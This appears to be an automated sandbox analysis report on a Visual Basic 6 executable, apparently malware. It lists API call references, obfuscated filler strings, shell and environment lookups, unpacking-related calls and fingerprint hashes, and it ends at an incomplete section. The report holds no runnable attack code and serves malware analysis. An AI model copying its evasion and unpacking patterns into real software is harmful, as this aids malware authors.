Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 21430a46d46916f4295ac05b1a5efe101f77e8381a837929a2cb18c81a033ae2
Instruction ID: 7ca04ca5b08439adfd08a0d17e8bcbd671c8bc5961515b6b908af521763b9300
Opcode Fuzzy Hash: 21430a46d46916f4295ac05b1a5efe101f77e8381a837929a2cb18c81a033ae2
Instruction Fuzzy Hash: 86014BB15082449FDB249F28C844AEEB7EAAFC4710F05441F9D89AB305CB719941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00414060, Relevance: 161.6, APIs: 76, Strings: 16, Instructions: 569COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 004140F9
#687.MSVBVM60(?,?), ref: 00414103
__vbaDateVar.MSVBVM60(?), ref: 0041410D
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414120
#615.MSVBVM60 ref: 00414129
__vbaVarDup.MSVBVM60 ref: 00414142
__vbaVarDup.MSVBVM60 ref: 00414154
#667.MSVBVM60(?), ref: 0041415A
__vbaStrMove.MSVBVM60 ref: 0041416B
#606.MSVBVM60(00000007,?,00000000), ref: 00414174
__vbaStrMove.MSVBVM60 ref: 0041417F
__vbaStrCmp.MSVBVM60(00000000), ref: 00414182
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041419C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004141AC
#648.MSVBVM60(?), ref: 004141E7
__vbaFreeVar.MSVBVM60 ref: 004141F3
#696.MSVBVM60(snirl), ref: 0041422B
#648.MSVBVM60(0000000A), ref: 0041425C
__vbaFreeVar.MSVBVM60 ref: 00414268
#648.MSVBVM60(0000000A), ref: 00414289
__vbaFreeVar.MSVBVM60 ref: 00414295
#696.MSVBVM60(jokergevinst), ref: 004142B2
#648.MSVBVM60(0000000A), ref: 004142DA
__vbaFreeVar.MSVBVM60 ref: 004142E6
#539.MSVBVM60(0000000A,000000B9,0000009D,000000ED), ref: 0041433E
__vbaVarCat.MSVBVM60(?,?,0000000A), ref: 0041435E
__vbaStrVarMove.MSVBVM60(00000000), ref: 00414365
__vbaStrMove.MSVBVM60 ref: 00414370
__vbaStrCopy.MSVBVM60 ref: 00414377
__vbaFreeStr.MSVBVM60 ref: 00414380
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?), ref: 00414390
#685.MSVBVM60 ref: 00414399
__vbaObjSet.MSVBVM60(?,00000000), ref: 004143A4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 004143C8
#685.MSVBVM60 ref: 004143CE
__vbaObjSet.MSVBVM60(?,00000000), ref: 004143D9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 004143FD
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414430
#685.MSVBVM60 ref: 0041445E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414469
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 0041448D
__vbaStrCopy.MSVBVM60 ref: 0041449B
__vbaFreeStr.MSVBVM60 ref: 004144C9
__vbaFreeObj.MSVBVM60 ref: 004144D2
#647.MSVBVM60(?,?), ref: 004144EE
__vbaStrVarVal.MSVBVM60(?,?), ref: 004144FC
#696.MSVBVM60(00000000), ref: 00414503
__vbaStrI4.MSVBVM60(001B150A,?), ref: 0041451D
__vbaStrMove.MSVBVM60 ref: 00414528
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041454A
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?), ref: 0041455A
#648.MSVBVM60(0000000A), ref: 00414575
__vbaStrCopy.MSVBVM60 ref: 00414590
__vbaStrMove.MSVBVM60 ref: 004145D3
__vbaFreeStr.MSVBVM60 ref: 004145D8
__vbaFreeVar.MSVBVM60 ref: 004145E1
#588.MSVBVM60(0000007D,00000062,00000030), ref: 004145ED
#564.MSVBVM60(0000000A,?), ref: 0041460F
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041461A
__vbaI4Var.MSVBVM60(?,?,003C43B0), ref: 00414656
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 00414689
#525.MSVBVM60(000000DC), ref: 00414697
__vbaStrMove.MSVBVM60 ref: 004146A2
__vbaStrMove.MSVBVM60(000011FB), ref: 004146B8
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004146DB
#648.MSVBVM60(00000004), ref: 004146F6
__vbaFreeVar.MSVBVM60 ref: 00414714
__vbaStrCopy.MSVBVM60 ref: 00414728
__vbaFreeStr.MSVBVM60 ref: 00414754
#564.MSVBVM60(0000000A,?), ref: 0041476C
__vbaHresultCheck.MSVBVM60(00000000), ref: 00414777
__vbaStrCopy.MSVBVM60 ref: 00414785
__vbaI4Var.MSVBVM60(?,Backbends,00002576), ref: 00414796
__vbaFreeStr.MSVBVM60 ref: 004147AB
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 004147B7
__vbaFreeStr.MSVBVM60(00414855), ref: 0041484E

Strings

5/5/5, xrefs: 004140EF
Backbends, xrefs: 0041478D
Sindbilleders, xrefs: 00414705
lhK, xrefs: 00414601
Satsformatets9, xrefs: 00414350
Heptapetalous, xrefs: 0041477D
jokergevinst, xrefs: 004142A7
appdata, xrefs: 00414138
snirl, xrefs: 00414220
Demiskrdderiets, xrefs: 004145B0
(dJHV\v%, xrefs: 004147C7
Fornuftsvsenerne9, xrefs: 0041457B
v%, xrefs: 00414738
V\F?, xrefs: 0041465D, 00414660
Tollbooths, xrefs: 00414493
Bini, xrefs: 00414720

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$List$Move$#648$CheckCopyHresult$#685#696$#564$#525#539#588#606#615#647#667#687Date
String ID: (dJHV\v%$5/5/5$Backbends$Bini$Demiskrdderiets$Fornuftsvsenerne9$Heptapetalous$Satsformatets9$Sindbilleders$Tollbooths$V\F?$appdata$jokergevinst$lhK$snirl$v%
API String ID: 3357908344-2975458384
Opcode ID: 9b1611adf4f31b7e92446710739a5da99c43d90eddc75e96beabdcc194418b04
Instruction ID: b2da97133f39f2931aec7c94cf46d8fbaa4b880c89f28eb509041dbe891ca617
Opcode Fuzzy Hash: 9b1611adf4f31b7e92446710739a5da99c43d90eddc75e96beabdcc194418b04
Instruction Fuzzy Hash: 3A325DB1900219DFDB14DFA4DD88EDEBBB8FF48300F108529E646A7290EB74A549CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00415030, Relevance: 70.2, APIs: 36, Strings: 4, Instructions: 221COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041508E
__vbaVarDup.MSVBVM60 ref: 004150AD
#617.MSVBVM60(?,?,0000006C), ref: 004150BD
__vbaVarTstGt.MSVBVM60(?,?), ref: 004150D9
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004150F2
#611.MSVBVM60 ref: 004150FC
__vbaStrMove.MSVBVM60 ref: 0041510D
__vbaVarDup.MSVBVM60 ref: 00415123
#518.MSVBVM60(?,?), ref: 00415131
__vbaStrVarMove.MSVBVM60(?), ref: 0041513B
__vbaStrMove.MSVBVM60 ref: 00415146
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415152
#610.MSVBVM60(?), ref: 00415163
__vbaStrVarVal.MSVBVM60(?,?), ref: 00415171
#540.MSVBVM60(?,00000000), ref: 0041517C
_adj_fdiv_m64.MSVBVM60 ref: 004151A5
_adj_fdiv_m64.MSVBVM60(00000008,?), ref: 004151D6
__vbaVarTstGe.MSVBVM60(00000008,?), ref: 004151E8
__vbaFreeStr.MSVBVM60 ref: 004151F8
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415208
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 0041522C
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415251
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 0041527E
__vbaFreeObj.MSVBVM60 ref: 00415298
#539.MSVBVM60(?,000000D7,000000D9,000000F9), ref: 004152B1
__vbaStrVarMove.MSVBVM60(?), ref: 004152BB
__vbaStrMove.MSVBVM60 ref: 004152C6
__vbaFreeVar.MSVBVM60 ref: 004152CB
__vbaVarDup.MSVBVM60 ref: 004152E5
#645.MSVBVM60(?,00000000), ref: 004152F0
__vbaStrMove.MSVBVM60 ref: 004152FB
__vbaFreeVar.MSVBVM60 ref: 00415300
__vbaFreeStr.MSVBVM60(00415362), ref: 00415350
__vbaFreeStr.MSVBVM60 ref: 00415355
__vbaFreeStr.MSVBVM60 ref: 0041535A
__vbaFreeStr.MSVBVM60 ref: 0041535F

Strings

Dorsally4, xrefs: 004150CB
DELIKATESSER, xrefs: 0041509F
disinhabit, xrefs: 004152D7
Kielbasa4, xrefs: 00415115

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult_adj_fdiv_m64$#518#539#540#610#611#617#645CopyNew2
String ID: DELIKATESSER$Dorsally4$Kielbasa4$disinhabit
API String ID: 1529234513-2571534993
Opcode ID: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
Instruction ID: d0022da710132c39d04a457d4db14dc12b6dad0a9a363c05a2efa2b7a27b2b3c
Opcode Fuzzy Hash: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
Instruction Fuzzy Hash: 53912971D00229DBCB05DFE4DD88AEEBB78FB48704F10812AE506B72A0DB745949CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00415DB0, Relevance: 63.3, APIs: 31, Strings: 5, Instructions: 268COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60 ref: 00415E4E
#667.MSVBVM60(?), ref: 00415E54
__vbaVarDup.MSVBVM60 ref: 00415E79
#666.MSVBVM60(?,?), ref: 00415E83
__vbaInStrVar.MSVBVM60(?,00000000,?,?,00000028), ref: 00415EAC
__vbaVarTstGe.MSVBVM60(00008002,00000000), ref: 00415EBA
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00415ED9
__vbaVarDup.MSVBVM60 ref: 00415F04
#619.MSVBVM60(?,?,000000A6), ref: 00415F13
__vbaStrVarMove.MSVBVM60(?), ref: 00415F1D
__vbaStrMove.MSVBVM60 ref: 00415F28
__vbaStrCopy.MSVBVM60 ref: 00415F39
__vbaFreeStr.MSVBVM60 ref: 00415F42
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415F52
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415F6E
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415F93
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,000000F0), ref: 00415FBD
__vbaStrMove.MSVBVM60 ref: 00415FD0
__vbaFreeObj.MSVBVM60 ref: 00415FD9
__vbaFreeStr.MSVBVM60(0041604C), ref: 00416045

Strings

$r, xrefs: 00415FFE
Haandstrgen5, xrefs: 00415EF4
userprofile, xrefs: 00415E3E
windir, xrefs: 00415E69
(j, xrefs: 00416168

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultList$#619#666#667CopyNew2
String ID: $r$(j$Haandstrgen5$userprofile$windir
API String ID: 877882336-2823200559
Opcode ID: 32618bed8d1ad747d99c005c47570e813bd95182c1f9a5c9111e887b9abf36c1
Instruction ID: 7f448852560e641fdbdfc2a89b6be07636c93bd5e1d8e21f7918077c7996ffb9
Opcode Fuzzy Hash: 32618bed8d1ad747d99c005c47570e813bd95182c1f9a5c9111e887b9abf36c1
Instruction Fuzzy Hash: 3BB10771900219EFCB14DFA4DD89AEEBBB8FB48700F10816AF505B72A0DB746949CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02AAAEFF, Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2b897d6ae61591dec36333f35d953f7e3fc3757dc0803dd7a354651b43d5d6c0
Instruction ID: fc940790dd71095095f7ff1b8587a0c036ad5276ab9f6876f93ee9ddf9ebbeb9
Opcode Fuzzy Hash: 2b897d6ae61591dec36333f35d953f7e3fc3757dc0803dd7a354651b43d5d6c0
Instruction Fuzzy Hash: 4D212471B003599BDF209F55CAD87DF3BA7EF59790F804029ED199B201EB304D098B90

Uniqueness

Uniqueness Score: -1.00%

Function 02AAAB88, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6c19c3c04bc56b27ae1440155d9b4a0ac8c5d8188aeb3f8581f4acdb30cacd52
Instruction ID: f86138605d317038a7258e394573e16c229a4db8fcd45c6416a7bd88ce9852bc
Opcode Fuzzy Hash: 6c19c3c04bc56b27ae1440155d9b4a0ac8c5d8188aeb3f8581f4acdb30cacd52
Instruction Fuzzy Hash: F0014572A013598BEF205F558EE87DB2BE6EF19780FC100298D486B242D7344A0D8F91

Uniqueness

Uniqueness Score: -1.00%

Function 02AA2D39, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 02AA8DF5

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f6098cd16437af894264de40a40fe5a9b75b5b703e0cc19bb9b06579aec2609e
Instruction ID: 696de682d39887dc0897c9e11ff896c245e84bd6de7de8f78307ce855465abfb
Opcode Fuzzy Hash: f6098cd16437af894264de40a40fe5a9b75b5b703e0cc19bb9b06579aec2609e
Instruction Fuzzy Hash: 4EE092702093499EC7442F3086977FFBBB5AF12384F0B085DDCC38906597664088C613

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AAC112, Relevance: 3.2, Strings: 2, Instructions: 693COMMON

Download Yara Rule

Strings

+(8, xrefs: 02AAC3E9
!.(o, xrefs: 02AAC7FA

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID: !.(o$+(8
API String ID: 3389902171-375622954
Opcode ID: 2346065d3f47523c0127dc2195423d5a0027ae463570ac6df8e1069eec935c71
Instruction ID: 77580e218b2266dc0e8f6c0c647bba2f0d0b5b1a55f44b8adcfc969172b4e9f5
Opcode Fuzzy Hash: 2346065d3f47523c0127dc2195423d5a0027ae463570ac6df8e1069eec935c71
Instruction Fuzzy Hash: 6C4217716043868FDB35DF3889E87DA7BE29F12360F49826ECCDA8B296D7348545C712

Uniqueness

Uniqueness Score: -1.00%

Function 02AAB126, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb58c6e6142cfcf5205c220f1ba8c5c1a19718c468c36bd49c3800af5371a692
Instruction ID: 5c688f4676706ac4c6a330da449b58eb6de5c9490a6ab47a7a29c4d48c134bed
Opcode Fuzzy Hash: eb58c6e6142cfcf5205c220f1ba8c5c1a19718c468c36bd49c3800af5371a692
Instruction Fuzzy Hash: A9115A70700345DFDB28CF64D9E4BEA73E2AFAA754F85842AD8498B354DB309908CB25

Uniqueness

Uniqueness Score: -1.00%

Function 02AAAB56, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914305d23a34769534fef598e15e06e577ccbf0e3e660d09fd95584388f0ecd0
Instruction ID: c638bfc64a3d9fb192b3716ecc59b87cf8a757dc463159480d3de8eb458c8748
Opcode Fuzzy Hash: 914305d23a34769534fef598e15e06e577ccbf0e3e660d09fd95584388f0ecd0
Instruction Fuzzy Hash: FAC09B36351640DFCB51CE8DC1D0FD073F5BB14650F814498714597621C754D805C604

Uniqueness

Uniqueness Score: -1.00%

Function 02AA8E06, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce094c17ff0539a258680c68828e6b2e04563b7050298198bf5bfd946f81cbb
Instruction ID: 5b670ab87fa907e8e1f6c664c1979a7ea21b275b375c65bc76afbf94becd050e
Opcode Fuzzy Hash: bce094c17ff0539a258680c68828e6b2e04563b7050298198bf5bfd946f81cbb
Instruction Fuzzy Hash: 0EC092B63006C18FFF0ADE08C582B8173B1FB25AC4B0944D4E442CB612C329E904CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00415920, Relevance: 103.6, APIs: 48, Strings: 11, Instructions: 322COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00415984
#582.MSVBVM60(36680000,4202A278), ref: 00415990
__vbaFpR8.MSVBVM60 ref: 00415996
__vbaStrCopy.MSVBVM60 ref: 004159B9
#712.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159CD
__vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159DE
__vbaStrCopy.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E4
__vbaFreeStr.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E9
#512.MSVBVM60(NAVIGATIONSSKOLERNES,00000081,?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159F9
__vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 00415A04
__vbaVarDup.MSVBVM60 ref: 00415A22
#558.MSVBVM60(?), ref: 00415A2C
__vbaFreeVar.MSVBVM60 ref: 00415A49
#716.MSVBVM60(?,WScript.Shell,00000000), ref: 00415A5F
__vbaObjVar.MSVBVM60(?), ref: 00415A69
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00415A74
__vbaFreeVar.MSVBVM60 ref: 00415A7D
__vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001), ref: 00415ADB
__vbaVarLateMemCallLd.MSVBVM60(?,00000000), ref: 00415AE9
__vbaStrVarMove.MSVBVM60(00000000), ref: 00415AF3
__vbaStrMove.MSVBVM60 ref: 00415AFE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415B0A
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415B26
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415B4B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,0000013C), ref: 00415B9C
__vbaFreeObj.MSVBVM60 ref: 00415BA5
#610.MSVBVM60(?), ref: 00415BBB
__vbaStrVarVal.MSVBVM60(?,?), ref: 00415BC9
#540.MSVBVM60(?,00000000), ref: 00415BD4
_adj_fdiv_m64.MSVBVM60 ref: 00415BFD
_adj_fdiv_m64.MSVBVM60 ref: 00415C29
__vbaVarTstGe.MSVBVM60(?,?), ref: 00415C40
__vbaFreeStr.MSVBVM60(?,?), ref: 00415C4C
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00415C5C
__vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415C81
__vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415CA6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 00415CD3
__vbaFreeObj.MSVBVM60 ref: 00415CED
#539.MSVBVM60(?,0000009D,000000BE,000000E5), ref: 00415D06
__vbaStrVarMove.MSVBVM60(?), ref: 00415D10
__vbaStrMove.MSVBVM60 ref: 00415D1B
__vbaStrCopy.MSVBVM60 ref: 00415D25
__vbaFreeStr.MSVBVM60 ref: 00415D2E
__vbaFreeVar.MSVBVM60 ref: 00415D37
__vbaFreeObj.MSVBVM60(00415D8A), ref: 00415D6E
__vbaFreeStr.MSVBVM60 ref: 00415D7D
__vbaFreeStr.MSVBVM60 ref: 00415D82
__vbaFreeStr.MSVBVM60 ref: 00415D87

Strings

Brasiliansk, xrefs: 004159B2
NAVIGATIONSSKOLERNES, xrefs: 004159F4
WINDIR, xrefs: 00415AA0
Environment, xrefs: 00415ACB
ctf, xrefs: 00415B79
PROCESS, xrefs: 00415ABB
Preludiet5, xrefs: 004159C2
Item, xrefs: 00415A98
PRODUKTUDVIKLER, xrefs: 00415A14
WScript.Shell, xrefs: 00415A56
Nonincreasing1, xrefs: 004159C7

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckCopyHresult$CallLateListNew2_adj_fdiv_m64$#512#539#540#558#582#610#712#716Addref
String ID: Brasiliansk$Environment$Item$NAVIGATIONSSKOLERNES$Nonincreasing1$PROCESS$PRODUKTUDVIKLER$Preludiet5$WINDIR$WScript.Shell$ctf
API String ID: 4167868168-594783680
Opcode ID: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
Instruction ID: bdfed9ac7365b67e29146c59590f7b3a1cc87b8179bb4dd4a60cd4cce7d5f936
Opcode Fuzzy Hash: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
Instruction Fuzzy Hash: 43D12B75900209EBDB04DFA4DE89ADEBBB4FF48704F10816AF505B72A0DB746985CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415390, Relevance: 77.2, APIs: 37, Strings: 7, Instructions: 229COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 004153AE
#693.MSVBVM60(Digitalkamera,?,?,?,?,00401326), ref: 004153E1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401326), ref: 004153FA
#578.MSVBVM60(Bfferne,?,?,?,?,00401326), ref: 0041540C
#517.MSVBVM60(Scapularies,?,?,?,?,00401326), ref: 00415427
__vbaStrMove.MSVBVM60(?,?,?,?,00401326), ref: 00415432
#610.MSVBVM60(?,?,?,?,?,00401326), ref: 00415443
#662.MSVBVM60(?,00402C74,?,00000002,00000001,00000001), ref: 0041546C
#696.MSVBVM60(Formaliaernes9), ref: 00415477
__vbaVarTstGt.MSVBVM60(00008002,?), ref: 00415499
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004154B4
__vbaFPInt.MSVBVM60(?,?,?,00401326), ref: 004154D9
#702.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 004154F5
__vbaStrMove.MSVBVM60 ref: 00415500
__vbaStrCopy.MSVBVM60 ref: 00415511
__vbaFreeStr.MSVBVM60 ref: 0041551A
__vbaFreeVar.MSVBVM60 ref: 00415523
#608.MSVBVM60(00000004,00000052), ref: 00415536
__vbaStrVarMove.MSVBVM60(00000004), ref: 00415540
__vbaStrMove.MSVBVM60 ref: 0041554B
__vbaFreeVar.MSVBVM60 ref: 00415554
__vbaVarDup.MSVBVM60 ref: 0041557B
#544.MSVBVM60(?,?), ref: 00415589
__vbaVarTstGt.MSVBVM60(00008002,?), ref: 004155AE
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004155C5
__vbaNew2.MSVBVM60(004029E8,0041746C,?,?,?,?,?,?,00401326), ref: 004155F7
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D8,00000014), ref: 0041565D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000060), ref: 004156BA
__vbaStrCopy.MSVBVM60 ref: 004156DE
__vbaFreeStr.MSVBVM60 ref: 004156E7
__vbaFreeObj.MSVBVM60 ref: 004156F0
__vbaStrCat.MSVBVM60(Unregenerable1,?), ref: 0041570C
__vbaStrMove.MSVBVM60 ref: 00415717
__vbaStrCopy.MSVBVM60 ref: 00415728
__vbaFreeStr.MSVBVM60 ref: 00415731
__vbaFreeStr.MSVBVM60(0041578E), ref: 0041577E
__vbaFreeStr.MSVBVM60 ref: 00415787

Strings

Formaliaernes9, xrefs: 00415472
16:16:16, xrefs: 00415561
ltA, xrefs: 00415613
Scapularies, xrefs: 00415422
Unregenerable1, xrefs: 00415707
Bfferne, xrefs: 00415407
Digitalkamera, xrefs: 004153DC

Memory Dump Source

Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$CheckHresultList$#517#544#578#608#610#662#693#696#702ChkstkErrorNew2
String ID: 16:16:16$Bfferne$Digitalkamera$Formaliaernes9$Scapularies$Unregenerable1$ltA
API String ID: 2918757743-1695909465
Opcode ID: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
Instruction ID: 3806a95896f8153a6f56456eff5a9f23e8b0e5f2b5942c0e8807afdb81e572b9
Opcode Fuzzy Hash: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
Instruction Fuzzy Hash: ADB10974900219EFDB14DFA0DE48BDDBBB4BF48705F1081A9E50AB72A0DB745A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046B8, Relevance: 56.1, APIs: 25, Strings: 7, Instructions: 138COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,660E6C30,660E1929), ref: 00414E68
#709.MSVBVM60(Lionisables5,renummererer,000000FF,00000000), ref: 00414E7B
#525.MSVBVM60(00000090), ref: 00414E8B
__vbaStrMove.MSVBVM60 ref: 00414E9C
#512.MSVBVM60(SIKSAKKENDES,00000063), ref: 00414EA5
__vbaStrMove.MSVBVM60 ref: 00414EB0
#523.MSVBVM60(valkeler), ref: 00414EBF
__vbaStrMove.MSVBVM60 ref: 00414ECA
#629.MSVBVM60(?,?,000000B4,?), ref: 00414EFB
__vbaVarTstNe.MSVBVM60(?,?), ref: 00414F1D
__vbaFreeStr.MSVBVM60 ref: 00414F2E
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 00414F3E
__vbaVarDup.MSVBVM60 ref: 00414F60
#522.MSVBVM60(00000002,00000008), ref: 00414F6E
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414F78
__vbaStrMove.MSVBVM60 ref: 00414F83
__vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 00414F8F
#527.MSVBVM60(JURYLESS), ref: 00414F9D
__vbaStrMove.MSVBVM60 ref: 00414FA8
__vbaStrCopy.MSVBVM60 ref: 00414FB5
__vbaFreeStr.MSVBVM60 ref: 00414FBE
__vbaFreeStr.MSVBVM60(0041500E), ref: 00414FFC
__vbaFreeStr.MSVBVM60 ref: 00415001
__vbaFreeStr.MSVBVM60 ref: 00415006
__vbaFreeStr.MSVBVM60 ref: 0041500B

Strings

renummererer, xrefs: 00414E71
SIKSAKKENDES, xrefs: 00414EA0
Lionisables5, xrefs: 00414E76
valkeler, xrefs: 00414EBA
Unstaggered6, xrefs: 00414F52
JURYLESS, xrefs: 00414F98
PHONOCARDIOGRAMME, xrefs: 00414F0C

Memory Dump Source

